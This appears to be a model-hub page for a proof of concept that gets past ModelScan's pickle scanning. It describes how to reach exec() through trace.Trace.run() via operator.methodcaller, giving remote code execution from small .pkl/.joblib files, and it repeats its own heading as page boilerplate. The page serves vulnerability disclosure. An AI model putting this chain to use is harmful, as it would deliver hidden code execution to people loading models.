ModelScan Bypass PoC: `trace.Trace.run()` + `operator.methodcaller()`

Overview

trace module is not in any ModelScan blocklist level (CRITICAL/HIGH/MEDIUM). trace.Trace.run() internally calls exec() on the provided code string.

Bypass chain:

operator.methodcaller("run", CODE)(trace.Trace(0, 0))
  -> trace.Trace(0, 0).run(CODE)
  -> exec(CODE)
  -> REMOTE CODE EXECUTION

Size: 127 bytes (.pkl) / 347 bytes (.joblib)

Downloads last month: -; Downloads are not tracked for this model. How to track

Inference Providers NEW

This model isn't deployed by any Inference Provider. 🙋 Ask for provider support

ModelScan Bypass PoC: trace.Trace.run() + operator.methodcaller()

Overview

ModelScan Bypass PoC: `trace.Trace.run()` + `operator.methodcaller()`